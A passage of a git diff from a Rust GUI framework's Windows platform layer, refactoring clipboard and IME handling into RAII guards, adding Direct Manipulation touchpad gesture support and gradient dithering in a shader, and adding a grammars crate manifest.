get_clipboard_data(*CLIPBOARD_HASH_FORMAT)?; + let hash_bytes: [u8; 8] = locked.as_bytes().get(..8)?.try_into().ok()?; + let hash = u64::from_ne_bytes(hash_bytes); + if hash != ClipboardString::text_hash(text) { return None; } - with_clipboard_data(*CLIPBOARD_HASH_FORMAT, |data_ptr, size| { - if size < 8 { - return None; - } - let hash_bytes: [u8; 8] = unsafe { - std::slice::from_raw_parts(data_ptr.cast::(), 8) - .try_into() - .ok() - }?; - Some(u64::from_ne_bytes(hash_bytes)) - })? + get_clipboard_string(*CLIPBOARD_METADATA_FORMAT) } -fn read_metadata_from_clipboard() -> Option { - unsafe { IsClipboardFormatAvailable(*CLIPBOARD_METADATA_FORMAT).ok()? }; - with_clipboard_data(*CLIPBOARD_METADATA_FORMAT, |data_ptr, _size| { - let pcwstr = PCWSTR(data_ptr as *const u16); - String::from_utf16_lossy(unsafe { pcwstr.as_wide() }) - }) +fn read_image(format: u32) -> Option { + let locked = get_clipboard_data(format)?; + let (bytes, image_format) = if format == CF_DIB.0 as u32 { + (convert_dib_to_bmp(locked.as_bytes())?, ImageFormat::Bmp) + } else { + let image_format = *IMAGE_FORMATS_MAP.get(&format)?; + (locked.as_bytes().to_vec(), image_format) + }; + let id = hash(&bytes); + Some(ClipboardEntry::Image(Image { + format: image_format, + bytes, + id, + })) } -fn read_image_from_clipboard(format: u32) -> Option { - // Handle CF_DIB format specially - it's raw bitmap data that needs conversion - if format == CF_DIB.0 as u32 { - return read_image_for_type(format, ImageFormat::Bmp, Some(convert_dib_to_bmp)); - } - let image_format = format_number_to_image_format(format)?; - read_image_for_type:: Option>>(format, *image_format, None) +fn read_files() -> Option { + let locked = get_clipboard_data(CF_HDROP.0 as u32)?; + let hdrop = HDROP(locked.ptr as *mut _); + let mut filenames = Vec::new(); + with_file_names(hdrop, |name| filenames.push(std::path::PathBuf::from(name))); + Some(ClipboardEntry::ExternalPaths(ExternalPaths( + filenames.into(), + ))) } -/// Convert DIB data to 
BMP file format. -/// DIB is essentially BMP without a file header, so we just need to add the 14-byte BITMAPFILEHEADER. -fn convert_dib_to_bmp(dib_data: &[u8]) -> Option> { - if dib_data.len() < 40 { +/// DIB is BMP without the 14-byte BITMAPFILEHEADER. Prepend one. +fn convert_dib_to_bmp(dib: &[u8]) -> Option> { + if dib.len() < 40 { return None; } - let file_size = 14 + dib_data.len() as u32; - // Calculate pixel data offset - let header_size = u32::from_le_bytes(dib_data[0..4].try_into().ok()?); - let bit_count = u16::from_le_bytes(dib_data[14..16].try_into().ok()?); - let compression = u32::from_le_bytes(dib_data[16..20].try_into().ok()?); + let header_size = u32::from_le_bytes(dib[0..4].try_into().ok()?); + let bit_count = u16::from_le_bytes(dib[14..16].try_into().ok()?); + let compression = u32::from_le_bytes(dib[16..20].try_into().ok()?); - // Calculate color table size let color_table_size = if bit_count <= 8 { - let colors_used = u32::from_le_bytes(dib_data[32..36].try_into().ok()?); - let num_colors = if colors_used == 0 { + let colors_used = u32::from_le_bytes(dib[32..36].try_into().ok()?); + (if colors_used == 0 { 1u32 << bit_count } else { colors_used - }; - num_colors * 4 + }) * 4 } else if compression == 3 { 12 // BI_BITFIELDS } else { 0 }; - let pixel_data_offset = 14 + header_size + color_table_size; + let pixel_offset = 14 + header_size + color_table_size; + let file_size = 14 + dib.len() as u32; - // Build BITMAPFILEHEADER (14 bytes) - let mut bmp_data = Vec::with_capacity(file_size as usize); - bmp_data.extend_from_slice(b"BM"); // Signature - bmp_data.extend_from_slice(&file_size.to_le_bytes()); // File size - bmp_data.extend_from_slice(&[0u8; 4]); // Reserved - bmp_data.extend_from_slice(&pixel_data_offset.to_le_bytes()); // Pixel data offset - bmp_data.extend_from_slice(dib_data); // DIB data + let mut bmp = Vec::with_capacity(file_size as usize); + bmp.extend_from_slice(b"BM"); + bmp.extend_from_slice(&file_size.to_le_bytes()); + 
bmp.extend_from_slice(&[0u8; 4]); // reserved + bmp.extend_from_slice(&pixel_offset.to_le_bytes()); + bmp.extend_from_slice(dib); + Some(bmp) +} - Some(bmp_data) +fn log_unsupported_clipboard_formats() { + let count = unsafe { CountClipboardFormats() }; + let mut format = 0; + for _ in 0..count { + format = unsafe { EnumClipboardFormats(format) }; + let mut buffer = [0u16; 64]; + unsafe { GetClipboardFormatNameW(format, &mut buffer) }; + let format_name = String::from_utf16_lossy(&buffer); + log::warn!( + "Try to paste with unsupported clipboard format: {}, {}.", + format, + format_name + ); + } } -#[inline] -fn format_number_to_image_format(format_number: u32) -> Option<&'static ImageFormat> { - IMAGE_FORMATS_MAP.get(&format_number) +fn gpui_to_image_format(value: ImageFormat) -> Option { + match value { + ImageFormat::Png => Some(image::ImageFormat::Png), + ImageFormat::Jpeg => Some(image::ImageFormat::Jpeg), + ImageFormat::Webp => Some(image::ImageFormat::WebP), + ImageFormat::Gif => Some(image::ImageFormat::Gif), + ImageFormat::Bmp => Some(image::ImageFormat::Bmp), + ImageFormat::Tiff => Some(image::ImageFormat::Tiff), + other => { + log::warn!("No image crate equivalent for format: {other:?}"); + None + } + } } -fn read_image_for_type( - format_number: u32, - format: ImageFormat, - convert: Option, -) -> Option -where - F: FnOnce(&[u8]) -> Option>, -{ - let (bytes, id) = with_clipboard_data(format_number, |data_ptr, size| { - let raw_bytes = unsafe { std::slice::from_raw_parts(data_ptr as *const u8, size) }; - let bytes = match convert { - Some(converter) => converter(raw_bytes)?, - None => raw_bytes.to_vec(), - }; - let id = hash(&bytes); - Some((bytes, id)) - })??; - Some(ClipboardEntry::Image(Image { format, bytes, id })) +struct ClipboardGuard; + +impl ClipboardGuard { + fn open() -> Option { + match unsafe { OpenClipboard(None) } { + Ok(()) => Some(Self), + Err(e) => { + log::error!("Failed to open clipboard: {e}"); + None + } + } + } } -fn 
read_files_from_clipboard() -> Option { - let filenames = with_clipboard_data(CF_HDROP.0 as u32, |data_ptr, _size| { - let hdrop = HDROP(data_ptr); - let mut filenames = Vec::new(); - with_file_names(hdrop, |file_name| { - filenames.push(std::path::PathBuf::from(file_name)); - }); - filenames - })?; - Some(ClipboardEntry::ExternalPaths(ExternalPaths( - filenames.into(), - ))) +impl Drop for ClipboardGuard { + fn drop(&mut self) { + if let Err(e) = unsafe { CloseClipboard() } { + log::error!("Failed to close clipboard: {e}"); + } + } } -fn with_clipboard_data(format: u32, f: F) -> Option -where - F: FnOnce(*mut std::ffi::c_void, usize) -> R, -{ - let global = HGLOBAL(unsafe { GetClipboardData(format).ok() }?.0); - let size = unsafe { GlobalSize(global) }; - let data_ptr = unsafe { GlobalLock(global) }; - let result = f(data_ptr, size); - unsafe { GlobalUnlock(global).ok() }; - Some(result) +struct LockedGlobal { + global: HGLOBAL, + ptr: *const u8, + size: usize, } -fn gpui_image_format_to_image(value: ImageFormat) -> image::ImageFormat { - match value { - ImageFormat::Png => image::ImageFormat::Png, - ImageFormat::Jpeg => image::ImageFormat::Jpeg, - ImageFormat::Webp => image::ImageFormat::WebP, - ImageFormat::Gif => image::ImageFormat::Gif, - // TODO: ImageFormat::Svg - ImageFormat::Bmp => image::ImageFormat::Bmp, - ImageFormat::Tiff => image::ImageFormat::Tiff, - _ => unreachable!(), +impl LockedGlobal { + fn lock(global: HGLOBAL) -> Option { + let size = unsafe { GlobalSize(global) }; + let ptr = unsafe { GlobalLock(global) }; + if ptr.is_null() { + return None; + } + Some(Self { + global, + ptr: ptr as *const u8, + size, + }) + } + + fn as_bytes(&self) -> &[u8] { + unsafe { std::slice::from_raw_parts(self.ptr, self.size) } + } +} + +impl Drop for LockedGlobal { + fn drop(&mut self) { + unsafe { GlobalUnlock(self.global).ok() }; } } diff --git a/crates/gpui_windows/src/direct_manipulation.rs b/crates/gpui_windows/src/direct_manipulation.rs new file mode 100644 
index 0000000000000000000000000000000000000000..08a1e5243e19e1ea6464ceb224754bee93573ea2 --- /dev/null +++ b/crates/gpui_windows/src/direct_manipulation.rs @@ -0,0 +1,359 @@ +use std::cell::{Cell, RefCell}; +use std::rc::Rc; + +use ::util::ResultExt; +use anyhow::Result; +use gpui::*; +use windows::Win32::{ + Foundation::*, + Graphics::{DirectManipulation::*, Gdi::*}, + System::Com::*, + UI::{Input::Pointer::*, WindowsAndMessaging::*}, +}; + +use crate::*; + +/// Default viewport size in pixels. The actual content size doesn't matter +/// because we're using the viewport only for gesture recognition, not for +/// visual output. +const DEFAULT_VIEWPORT_SIZE: i32 = 1000; + +pub(crate) struct DirectManipulationHandler { + manager: IDirectManipulationManager, + update_manager: IDirectManipulationUpdateManager, + viewport: IDirectManipulationViewport, + _handler_cookie: u32, + window: HWND, + scale_factor: Rc>, + pending_events: Rc>>, +} + +impl DirectManipulationHandler { + pub fn new(window: HWND, scale_factor: f32) -> Result { + unsafe { + let manager: IDirectManipulationManager = + CoCreateInstance(&DirectManipulationManager, None, CLSCTX_INPROC_SERVER)?; + + let update_manager: IDirectManipulationUpdateManager = manager.GetUpdateManager()?; + + let viewport: IDirectManipulationViewport = manager.CreateViewport(None, window)?; + + let configuration = DIRECTMANIPULATION_CONFIGURATION_INTERACTION + | DIRECTMANIPULATION_CONFIGURATION_TRANSLATION_X + | DIRECTMANIPULATION_CONFIGURATION_TRANSLATION_Y + | DIRECTMANIPULATION_CONFIGURATION_TRANSLATION_INERTIA + | DIRECTMANIPULATION_CONFIGURATION_RAILS_X + | DIRECTMANIPULATION_CONFIGURATION_RAILS_Y + | DIRECTMANIPULATION_CONFIGURATION_SCALING; + viewport.ActivateConfiguration(configuration)?; + + viewport.SetViewportOptions( + DIRECTMANIPULATION_VIEWPORT_OPTIONS_MANUALUPDATE + | DIRECTMANIPULATION_VIEWPORT_OPTIONS_DISABLEPIXELSNAPPING, + )?; + + let mut rect = RECT { + left: 0, + top: 0, + right: DEFAULT_VIEWPORT_SIZE, + 
bottom: DEFAULT_VIEWPORT_SIZE, + }; + viewport.SetViewportRect(&mut rect)?; + + manager.Activate(window)?; + viewport.Enable()?; + + let scale_factor = Rc::new(Cell::new(scale_factor)); + let pending_events = Rc::new(RefCell::new(Vec::new())); + + let event_handler: IDirectManipulationViewportEventHandler = + DirectManipulationEventHandler::new( + window, + Rc::clone(&scale_factor), + Rc::clone(&pending_events), + ) + .into(); + + let handler_cookie = viewport.AddEventHandler(Some(window), &event_handler)?; + + update_manager.Update(None)?; + + Ok(Self { + manager, + update_manager, + viewport, + _handler_cookie: handler_cookie, + window, + scale_factor, + pending_events, + }) + } + } + + pub fn set_scale_factor(&self, scale_factor: f32) { + self.scale_factor.set(scale_factor); + } + + pub fn on_pointer_hit_test(&self, wparam: WPARAM) { + unsafe { + let pointer_id = wparam.loword() as u32; + let mut pointer_type = POINTER_INPUT_TYPE::default(); + if GetPointerType(pointer_id, &mut pointer_type).is_ok() && pointer_type == PT_TOUCHPAD + { + self.viewport.SetContact(pointer_id).log_err(); + } + } + } + + pub fn update(&self) { + unsafe { + self.update_manager.Update(None).log_err(); + } + } + + pub fn drain_events(&self) -> Vec { + std::mem::take(&mut *self.pending_events.borrow_mut()) + } +} + +impl Drop for DirectManipulationHandler { + fn drop(&mut self) { + unsafe { + self.viewport.Stop().log_err(); + self.viewport.Abandon().log_err(); + self.manager.Deactivate(self.window).log_err(); + } + } +} + +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +enum GestureKind { + None, + Scroll, + Pinch, +} + +#[windows_core::implement(IDirectManipulationViewportEventHandler)] +struct DirectManipulationEventHandler { + window: HWND, + scale_factor: Rc>, + gesture_kind: Cell, + last_scale: Cell, + last_x_offset: Cell, + last_y_offset: Cell, + scroll_phase: Cell, + pending_events: Rc>>, +} + +impl DirectManipulationEventHandler { + fn new( + window: HWND, + scale_factor: Rc>, + 
pending_events: Rc>>, + ) -> Self { + Self { + window, + scale_factor, + gesture_kind: Cell::new(GestureKind::None), + last_scale: Cell::new(1.0), + last_x_offset: Cell::new(0.0), + last_y_offset: Cell::new(0.0), + scroll_phase: Cell::new(TouchPhase::Started), + pending_events, + } + } + + fn end_gesture(&self) { + let position = self.mouse_position(); + let modifiers = current_modifiers(); + match self.gesture_kind.get() { + GestureKind::Scroll => { + self.pending_events + .borrow_mut() + .push(PlatformInput::ScrollWheel(ScrollWheelEvent { + position, + delta: ScrollDelta::Pixels(point(px(0.0), px(0.0))), + modifiers, + touch_phase: TouchPhase::Ended, + })); + } + GestureKind::Pinch => { + self.pending_events + .borrow_mut() + .push(PlatformInput::Pinch(PinchEvent { + position, + delta: 0.0, + modifiers, + phase: TouchPhase::Ended, + })); + } + GestureKind::None => {} + } + self.gesture_kind.set(GestureKind::None); + } + + fn mouse_position(&self) -> Point { + let scale_factor = self.scale_factor.get(); + unsafe { + let mut point: POINT = std::mem::zeroed(); + let _ = GetCursorPos(&mut point); + let _ = ScreenToClient(self.window, &mut point); + logical_point(point.x as f32, point.y as f32, scale_factor) + } + } +} + +impl IDirectManipulationViewportEventHandler_Impl for DirectManipulationEventHandler_Impl { + fn OnViewportStatusChanged( + &self, + viewport: windows_core::Ref<'_, IDirectManipulationViewport>, + current: DIRECTMANIPULATION_STATUS, + previous: DIRECTMANIPULATION_STATUS, + ) -> windows_core::Result<()> { + if current == previous { + return Ok(()); + } + + // A new gesture interrupted inertia, so end the old sequence. + if current == DIRECTMANIPULATION_RUNNING && previous == DIRECTMANIPULATION_INERTIA { + self.end_gesture(); + } + + if current == DIRECTMANIPULATION_READY { + self.end_gesture(); + + // Reset the content transform so the viewport is ready for the next gesture. 
+ // ZoomToRect triggers a second RUNNING -> READY cycle, so prevent an infinite loop here. + if self.last_scale.get() != 1.0 + || self.last_x_offset.get() != 0.0 + || self.last_y_offset.get() != 0.0 + { + if let Some(viewport) = viewport.as_ref() { + unsafe { + viewport + .ZoomToRect( + 0.0, + 0.0, + DEFAULT_VIEWPORT_SIZE as f32, + DEFAULT_VIEWPORT_SIZE as f32, + false, + ) + .log_err(); + } + } + } + + self.last_scale.set(1.0); + self.last_x_offset.set(0.0); + self.last_y_offset.set(0.0); + } + + Ok(()) + } + + fn OnViewportUpdated( + &self, + _viewport: windows_core::Ref<'_, IDirectManipulationViewport>, + ) -> windows_core::Result<()> { + Ok(()) + } + + fn OnContentUpdated( + &self, + _viewport: windows_core::Ref<'_, IDirectManipulationViewport>, + content: windows_core::Ref<'_, IDirectManipulationContent>, + ) -> windows_core::Result<()> { + let content = content.as_ref().ok_or(E_POINTER)?; + + // Get the 6-element content transform: [scale, 0, 0, scale, tx, ty] + let mut xform = [0.0f32; 6]; + unsafe { + content.GetContentTransform(&mut xform)?; + } + + let scale = xform[0]; + let scale_factor = self.scale_factor.get(); + let x_offset = xform[4] / scale_factor; + let y_offset = xform[5] / scale_factor; + + if scale == 0.0 { + return Ok(()); + } + + let last_scale = self.last_scale.get(); + let last_x = self.last_x_offset.get(); + let last_y = self.last_y_offset.get(); + + if float_equals(scale, last_scale) + && float_equals(x_offset, last_x) + && float_equals(y_offset, last_y) + { + return Ok(()); + } + + let position = self.mouse_position(); + let modifiers = current_modifiers(); + + // Direct Manipulation reports both translation and scale in every content update. + // Translation values can shift during a pinch due to the zoom center shifting. + // We classify each gesture as either scroll or pinch and only emit one type of event. + // We allow Scroll -> Pinch (a pinch can start with a small pan) but not the reverse. 
+ if !float_equals(scale, 1.0) { + if self.gesture_kind.get() != GestureKind::Pinch { + self.end_gesture(); + self.gesture_kind.set(GestureKind::Pinch); + self.pending_events + .borrow_mut() + .push(PlatformInput::Pinch(PinchEvent { + position, + delta: 0.0, + modifiers, + phase: TouchPhase::Started, + })); + } + } else if self.gesture_kind.get() == GestureKind::None { + self.gesture_kind.set(GestureKind::Scroll); + self.scroll_phase.set(TouchPhase::Started); + } + + match self.gesture_kind.get() { + GestureKind::Scroll => { + let dx = x_offset - last_x; + let dy = y_offset - last_y; + let touch_phase = self.scroll_phase.get(); + self.scroll_phase.set(TouchPhase::Moved); + self.pending_events + .borrow_mut() + .push(PlatformInput::ScrollWheel(ScrollWheelEvent { + position, + delta: ScrollDelta::Pixels(point(px(dx), px(dy))), + modifiers, + touch_phase, + })); + } + GestureKind::Pinch => { + let scale_delta = scale / last_scale; + self.pending_events + .borrow_mut() + .push(PlatformInput::Pinch(PinchEvent { + position, + delta: scale_delta - 1.0, + modifiers, + phase: TouchPhase::Moved, + })); + } + GestureKind::None => {} + } + + self.last_scale.set(scale); + self.last_x_offset.set(x_offset); + self.last_y_offset.set(y_offset); + + Ok(()) + } +} + +fn float_equals(f1: f32, f2: f32) -> bool { + const EPSILON_SCALE: f32 = 0.00001; + (f1 - f2).abs() < EPSILON_SCALE * f1.abs().max(f2.abs()).max(EPSILON_SCALE) +} diff --git a/crates/gpui_windows/src/directx_atlas.rs b/crates/gpui_windows/src/directx_atlas.rs index a2ded660ca232a32b2a609c6185a95433c803d9c..03acadb8607ed3e7d957e7faa73960724fa09888 100644 --- a/crates/gpui_windows/src/directx_atlas.rs +++ b/crates/gpui_windows/src/directx_atlas.rs @@ -116,7 +116,6 @@ impl PlatformAtlas for DirectXAtlas { texture.decrement_ref_count(); if texture.is_unreferenced() { textures.free_list.push(texture.id.index as usize); - lock.tiles_by_key.remove(key); } else { *texture_slot = Some(texture); } diff --git 
a/crates/gpui_windows/src/dispatcher.rs b/crates/gpui_windows/src/dispatcher.rs index 060cdb7ba626133b9c201980e54bd0479694faa6..60b9898cef3076fa64898ebcb7223616150bf01b 100644 --- a/crates/gpui_windows/src/dispatcher.rs +++ b/crates/gpui_windows/src/dispatcher.rs @@ -24,7 +24,7 @@ use windows::{ use crate::{HWND, SafeHwnd, WM_GPUI_TASK_DISPATCHED_ON_MAIN_THREAD}; use gpui::{ GLOBAL_THREAD_TIMINGS, PlatformDispatcher, Priority, PriorityQueueSender, RunnableVariant, - THREAD_TIMINGS, TaskTiming, ThreadTaskTimings, TimerResolutionGuard, + TaskTiming, ThreadTaskTimings, TimerResolutionGuard, }; pub(crate) struct WindowsDispatcher { @@ -58,10 +58,6 @@ impl WindowsDispatcher { let mut task_wrapper = Some(runnable); WorkItemHandler::new(move |_| { let runnable = task_wrapper.take().unwrap(); - // Check if the executor that spawned this task was closed - if runnable.metadata().is_closed() { - return Ok(()); - } Self::execute_runnable(runnable); Ok(()) }) @@ -75,10 +71,6 @@ impl WindowsDispatcher { let mut task_wrapper = Some(runnable); TimerElapsedHandler::new(move |_| { let runnable = task_wrapper.take().unwrap(); - // Check if the executor that spawned this task was closed - if runnable.metadata().is_closed() { - return Ok(()); - } Self::execute_runnable(runnable); Ok(()) }) @@ -114,25 +106,7 @@ impl PlatformDispatcher for WindowsDispatcher { } fn get_current_thread_timings(&self) -> gpui::ThreadTaskTimings { - THREAD_TIMINGS.with(|timings| { - let timings = timings.lock(); - let thread_name = timings.thread_name.clone(); - let total_pushed = timings.total_pushed; - let timings = &timings.timings; - - let mut vec = Vec::with_capacity(timings.len()); - - let (s1, s2) = timings.as_slices(); - vec.extend_from_slice(s1); - vec.extend_from_slice(s2); - - gpui::ThreadTaskTimings { - thread_name, - thread_id: std::thread::current().id(), - timings: vec, - total_pushed, - } - }) + gpui::profiler::get_current_thread_task_timings() } fn is_main_thread(&self) -> bool { diff --git 
a/crates/gpui_windows/src/events.rs b/crates/gpui_windows/src/events.rs index 6bc7b73cc756b44b08ddf7abc5f668681c03dcb9..21eb6bed899687e1c639efdc40788c229fdc4728 100644 --- a/crates/gpui_windows/src/events.rs +++ b/crates/gpui_windows/src/events.rs @@ -111,6 +111,7 @@ impl WindowsWindowInner { WM_GPUI_CURSOR_STYLE_CHANGED => self.handle_cursor_changed(lparam), WM_GPUI_FORCE_UPDATE_WINDOW => self.draw_window(handle, true), WM_GPUI_GPU_DEVICE_LOST => self.handle_device_lost(lparam), + DM_POINTERHITTEST => self.handle_dm_pointer_hit_test(wparam), _ => None, }; if let Some(n) = handled { @@ -593,33 +594,63 @@ impl WindowsWindowInner { } pub(crate) fn update_ime_position(&self, handle: HWND, caret_position: POINT) { + let Some(ctx) = ImeContext::get(handle) else { + return; + }; unsafe { - let ctx = ImmGetContext(handle); - if ctx.is_invalid() { - return; - } + ImmSetCompositionWindow( + *ctx, + &COMPOSITIONFORM { + dwStyle: CFS_POINT, + ptCurrentPos: caret_position, + ..Default::default() + }, + ) + .ok() + .log_err(); - let config = COMPOSITIONFORM { - dwStyle: CFS_POINT, - ptCurrentPos: caret_position, - ..Default::default() - }; - ImmSetCompositionWindow(ctx, &config).ok().log_err(); - let config = CANDIDATEFORM { - dwStyle: CFS_CANDIDATEPOS, - ptCurrentPos: caret_position, - ..Default::default() - }; - ImmSetCandidateWindow(ctx, &config).ok().log_err(); - ImmReleaseContext(handle, ctx).ok().log_err(); + ImmSetCandidateWindow( + *ctx, + &CANDIDATEFORM { + dwStyle: CFS_CANDIDATEPOS, + ptCurrentPos: caret_position, + ..Default::default() + }, + ) + .ok() + .log_err(); + } + } + + fn update_ime_enabled(&self, handle: HWND) { + let ime_enabled = self + .with_input_handler(|input_handler| input_handler.query_accepts_text_input()) + .unwrap_or(false); + if ime_enabled == self.state.ime_enabled.get() { + return; + } + self.state.ime_enabled.set(ime_enabled); + unsafe { + if ime_enabled { + ImmAssociateContextEx(handle, HIMC::default(), IACE_DEFAULT) + .ok() + .log_err(); + 
} else { + if let Some(ctx) = ImeContext::get(handle) { + ImmNotifyIME(*ctx, NI_COMPOSITIONSTR, CPS_COMPLETE, 0) + .ok() + .log_err(); + } + ImmAssociateContextEx(handle, HIMC::default(), 0) + .ok() + .log_err(); + } } } fn handle_ime_composition(&self, handle: HWND, lparam: LPARAM) -> Option { - let ctx = unsafe { ImmGetContext(handle) }; - let result = self.handle_ime_composition_inner(ctx, lparam); - unsafe { ImmReleaseContext(handle, ctx).ok().log_err() }; - result + let ctx = ImeContext::get(handle)?; + self.handle_ime_composition_inner(*ctx, lparam) } fn handle_ime_composition_inner(&self, ctx: HIMC, lparam: LPARAM) -> Option { @@ -728,6 +759,10 @@ impl WindowsWindowInner { self.state.scale_factor.set(new_scale_factor); self.state.border_offset.update(handle).log_err(); + self.state + .direct_manipulation + .set_scale_factor(new_scale_factor); + if is_maximized { // Get the monitor and its work area at the new DPI let monitor = unsafe { MonitorFromWindow(handle, MONITOR_DEFAULTTONEAREST) }; @@ -1109,20 +1144,39 @@ impl WindowsWindowInner { Some(0) } + fn handle_dm_pointer_hit_test(&self, wparam: WPARAM) -> Option { + self.state.direct_manipulation.on_pointer_hit_test(wparam); + None + } + #[inline] fn draw_window(&self, handle: HWND, force_render: bool) -> Option { let mut request_frame = self.state.callbacks.request_frame.take()?; - // we are instructing gpui to force render a frame, this will - // re-populate all the gpu textures for us so we can resume drawing in - // case we disabled drawing earlier due to a device loss - self.state.renderer.borrow_mut().mark_drawable(); + self.state.direct_manipulation.update(); + + let events = self.state.direct_manipulation.drain_events(); + if !events.is_empty() { + if let Some(mut func) = self.state.callbacks.input.take() { + for event in events { + func(event); + } + self.state.callbacks.input.set(Some(func)); + } + } + + if force_render { + // Re-enable drawing after a device loss recovery. 
The forced render + // will rebuild the scene with fresh atlas textures. + self.state.renderer.borrow_mut().mark_drawable(); + } request_frame(RequestFrameOptions { require_presentation: false, force_render, }); self.state.callbacks.request_frame.set(Some(request_frame)); + self.update_ime_enabled(handle); unsafe { ValidateRect(Some(handle), None).ok().log_err() }; Some(0) @@ -1205,6 +1259,36 @@ impl WindowsWindowInner { } } +struct ImeContext { + hwnd: HWND, + himc: HIMC, +} + +impl ImeContext { + fn get(hwnd: HWND) -> Option { + let himc = unsafe { ImmGetContext(hwnd) }; + if himc.is_invalid() { + return None; + } + Some(Self { hwnd, himc }) + } +} + +impl std::ops::Deref for ImeContext { + type Target = HIMC; + fn deref(&self) -> &HIMC { + &self.himc + } +} + +impl Drop for ImeContext { + fn drop(&mut self) { + unsafe { + ImmReleaseContext(self.hwnd, self.himc).ok().log_err(); + } + } +} + fn handle_key_event( wparam: WPARAM, lparam: LPARAM, diff --git a/crates/gpui_windows/src/gpui_windows.rs b/crates/gpui_windows/src/gpui_windows.rs index af7408569ab1c88fc5f433795da99354942d89f2..0af5411d20e4fbb9d326e833641a2d4e5369dcb2 100644 --- a/crates/gpui_windows/src/gpui_windows.rs +++ b/crates/gpui_windows/src/gpui_windows.rs @@ -2,6 +2,7 @@ mod clipboard; mod destination_list; +mod direct_manipulation; mod direct_write; mod directx_atlas; mod directx_devices; diff --git a/crates/gpui_windows/src/platform.rs b/crates/gpui_windows/src/platform.rs index 182107138579be858272329a75a9daededd438e4..7e9f1e77487b4185fbad9e1dc66cfcb1c8191e61 100644 --- a/crates/gpui_windows/src/platform.rs +++ b/crates/gpui_windows/src/platform.rs @@ -1326,7 +1326,15 @@ unsafe extern "system" fn window_procedure( } let inner = unsafe { &*ptr }; let result = if let Some(inner) = inner.upgrade() { - inner.handle_msg(hwnd, msg, wparam, lparam) + if cfg!(debug_assertions) { + let inner = std::panic::AssertUnwindSafe(inner); + match std::panic::catch_unwind(|| { inner }.handle_msg(hwnd, msg, wparam, 
lparam)) { + Ok(result) => result, + Err(_) => std::process::abort(), + } + } else { + inner.handle_msg(hwnd, msg, wparam, lparam) + } } else { unsafe { DefWindowProcW(hwnd, msg, wparam, lparam) } }; diff --git a/crates/gpui_windows/src/shaders.hlsl b/crates/gpui_windows/src/shaders.hlsl index f508387daf9c98ffcce521209d2c981cf04db983..646cfd61cc37c31fade09d427c6d7c8f87519fa6 100644 --- a/crates/gpui_windows/src/shaders.hlsl +++ b/crates/gpui_windows/src/shaders.hlsl @@ -384,6 +384,20 @@ float4 gradient_color(Background background, break; } } + + // Dither to reduce banding in gradients (especially dark/alpha). + // Triangular-distributed noise breaks up 8-bit quantization steps. + // ±2/255 for RGB (enough for dark-on-dark compositing), + // ±3/255 for alpha (needs more because alpha × dark color = tiny steps). + { + float2 seed = position * 0.6180339887; // golden ratio spread + float r1 = frac(sin(dot(seed, float2(12.9898, 78.233))) * 43758.5453); + float r2 = frac(sin(dot(seed, float2(39.3460, 11.135))) * 24634.6345); + float tri = r1 + r2 - 1.0; // triangular PDF, range [-1, +1] + color.rgb += tri * 2.0 / 255.0; + color.a += tri * 3.0 / 255.0; + } + break; } case 2: { diff --git a/crates/gpui_windows/src/window.rs b/crates/gpui_windows/src/window.rs index 02653d7e53a4356979b81897b39ab0393bbf54a9..f655c1989e2c69743032703532f91b3b517084b6 100644 --- a/crates/gpui_windows/src/window.rs +++ b/crates/gpui_windows/src/window.rs @@ -20,12 +20,15 @@ use windows::{ Foundation::*, Graphics::Dwm::*, Graphics::Gdi::*, - System::{Com::*, LibraryLoader::*, Ole::*, SystemServices::*}, + System::{ + Com::*, Diagnostics::Debug::MessageBeep, LibraryLoader::*, Ole::*, SystemServices::*, + }, UI::{Controls::*, HiDpi::*, Input::KeyboardAndMouse::*, Shell::*, WindowsAndMessaging::*}, }, core::*, }; +use crate::direct_manipulation::DirectManipulationHandler; use crate::*; use gpui::*; @@ -52,10 +55,12 @@ pub struct WindowsWindowState { pub callbacks: Callbacks, pub input_handler: 
Cell>, + pub ime_enabled: Cell, pub pending_surrogate: Cell>, pub last_reported_modifiers: Cell>, pub last_reported_capslock: Cell>, pub hovered: Cell, + pub direct_manipulation: DirectManipulationHandler, pub renderer: RefCell, @@ -130,6 +135,9 @@ impl WindowsWindowState { let fullscreen = None; let initial_placement = None; + let direct_manipulation = DirectManipulationHandler::new(hwnd, scale_factor) + .context("initializing Direct Manipulation")?; + Ok(Self { origin: Cell::new(origin), logical_size: Cell::new(logical_size), @@ -142,6 +150,7 @@ impl WindowsWindowState { min_size, callbacks, input_handler: Cell::new(input_handler), + ime_enabled: Cell::new(true), pending_surrogate: Cell::new(pending_surrogate), last_reported_modifiers: Cell::new(last_reported_modifiers), last_reported_capslock: Cell::new(last_reported_capslock), @@ -155,6 +164,7 @@ impl WindowsWindowState { initial_placement: Cell::new(initial_placement), hwnd, invalidate_devices, + direct_manipulation, }) } @@ -530,10 +540,9 @@ impl rwh::HasWindowHandle for WindowsWindow { } } -// todo(windows) impl rwh::HasDisplayHandle for WindowsWindow { fn display_handle(&self) -> std::result::Result, rwh::HandleError> { - unimplemented!() + Ok(rwh::DisplayHandle::windows()) } } @@ -942,6 +951,11 @@ impl PlatformWindow for WindowsWindow { self.0.update_ime_position(self.0.hwnd, caret_position); } + + fn play_system_bell(&self) { + // MB_OK: The sound specified as the Windows Default Beep sound. 
+ let _ = unsafe { MessageBeep(MB_OK) }; + } } #[implement(IDropTarget)] diff --git a/crates/grammars/Cargo.toml b/crates/grammars/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..13b3bf5c94bb459e49e5b1f337fe95b1b216829a --- /dev/null +++ b/crates/grammars/Cargo.toml @@ -0,0 +1,60 @@ +[package] +name = "grammars" +version = "0.1.0" +edition = "2024" +publish = false + +[lints] +workspace = true + +[lib] +path = "src/grammars.rs" + +[dependencies] +language_core.workspace = true +rust-embed.workspace = true +anyhow.workspace = true +toml.workspace = true +util.workspace = true + +tree-sitter = { workspace = true, optional = true } +tree-sitter-bash = { workspace = true, optional = true } +tree-sitter-c = { workspace = true, optional = true } +tree-sitter-cpp = { workspace = true, optional = true } +tree-sitter-css = { workspace = true, optional = true } +tree-sitter-diff = { workspace = true, optional = true } +tree-sitter-gitcommit = { workspace = true, optional = true } +tree-sitter-go = { workspace = true, optional = true } +tree-sitter-go-mod = { workspace = true, optional = true } +tree-sitter-gowork = { workspace = true, optional = true } +tree-sitter-jsdoc = { workspace = true, optional = true } +tree-sitter-json = { workspace = true, optional = true } +tree-sitter-md = { workspace = true, optional = true } +tree-sitter-python = { workspace = true, optional = true } +tree-sitter-regex = { workspace = true, optional = true } +tree-sitter-rust = { workspace = true, optional = true } +tree-sitter-typescript = { workspace = true, optional = true } 